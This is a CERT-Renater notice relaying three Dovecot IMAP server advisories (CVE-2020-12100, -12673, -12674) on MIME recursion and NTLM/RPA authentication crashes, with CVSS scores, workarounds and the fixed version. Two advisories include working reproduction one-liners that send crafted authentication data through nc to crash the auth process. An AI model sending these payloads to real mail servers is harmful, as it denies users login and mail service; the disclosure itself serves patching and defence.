==================================================================== CERT-Renater Note d'Information No. 2020/VULN445 _____________________________________________________________________ DATE : 12/08/2020 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running Dovecot IMAP server versions prior to 2.3.11.3. ===================================================================== https://dovecot.org/pipermail/dovecot-news/2020-August/000441.html https://dovecot.org/pipermail/dovecot-news/2020-August/000442.html https://dovecot.org/pipermail/dovecot-news/2020-August/000443.html _____________________________________________________________________ Open-Xchange Security Advisory 2020-08-12 Affected product: Dovecot IMAP server Internal reference: DOP-1849 (Bug ID) Vulnerability type: Uncontrolled recursion (CWE-674) Vulnerable version: 2.0 Vulnerable component: submission, lmtp, lda Fixed version: 2.3.11.3 Report confidence: Confirmed Solution status: Fix available Vendor notification: 2020-04-23 CVE reference: CVE-2020-12100 CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) Vulnerability Details: Receiving mail with deeply nested MIME parts leads to resource exhaustion as Dovecot attempts to parse it. Risk: Malicious actor can cause denial of service to mail delivery by repeatedly sending mails with bad content. Workaround: Limit MIME structures in MTA. Solution: Upgrade to fixed version. Best regards, Aki Tuomi Open-Xchange oy _____________________________________________________________________ Open-Xchange Security Advisory 2020-08-12 Affected product: Dovecot IMAP server Internal reference: DOP-1870 (Bug ID) Vulnerability type: CWE-789 (Uncontrolled Memory Allocation) Vulnerable version: 2.2 Vulnerable component: auth Fixed version: 2.3.11.3 Report confidence: Confirmed Solution status: Fix available Vendor notification: 2020-05-03 CVE reference: CVE-2020-12673 CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) Vulnerability Details: Dovecot's NTLM implementation does not correctly check message buffer size, which leads to reading past allocation which can lead to crash. Risk: An adversary can use this vulnerability to crash dovecot auth process repeatedly, preventing login. Steps to reproduce: (echo 'AUTH NTLM'; echo -ne 'NTLMSSP\x00\x01\x00\x00\x00\x00\x02\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' | \ base64 -w0 ;echo ;echo -ne 'NTLMSSP\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00AA\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00orange\x00'| \ base64 -w0;echo ; echo QUIT) | nc 127.0.0.1 110 Workaround: Disable NTLM authentication. Solution: Upgrade to fixed version. Best regards, Aki Tuomi Open-Xchange oy _____________________________________________________________________ Open-Xchange Security Advisory 2020-08-12 Affected product: Dovecot IMAP server Internal reference: DOP-1869 (Bug ID) Vulnerability type: CWE-126 (Buffer over-read) Vulnerable version: 2.2 Vulnerable component: auth Fixed version: 2.3.11.3 Report confidence: Confirmed Solution status: Fix available Vendor notification: 2020-05-03 Researcher credit: Orange from DEVCORE team CVE reference: CVE-2020-12674 CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) Vulnerability Details: Dovecot's RPA mechanism implementation accepts zero-length message, which leads to assert-crash later on Risk: An adversary can use this vulnerability to crash dovecot auth process repeatedly, preventing login. Steps to reproduce: (echo 'AUTH RPA'; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01' | base64 -w 0; echo ; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A at A\x00' | base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110 Workaround: Disable RPA authentication. Solution: Upgrade to fixed version. Best regards, Aki Tuomi Open-Xchange oy ========================================================= + CERT-RENATER       |    tel : 01-53-94-20-44          + + 23/25 Rue Daviel   |    fax : 01-53-94-20-41          + + 75013 Paris        |    email:cert@support.renater.fr + =========================================================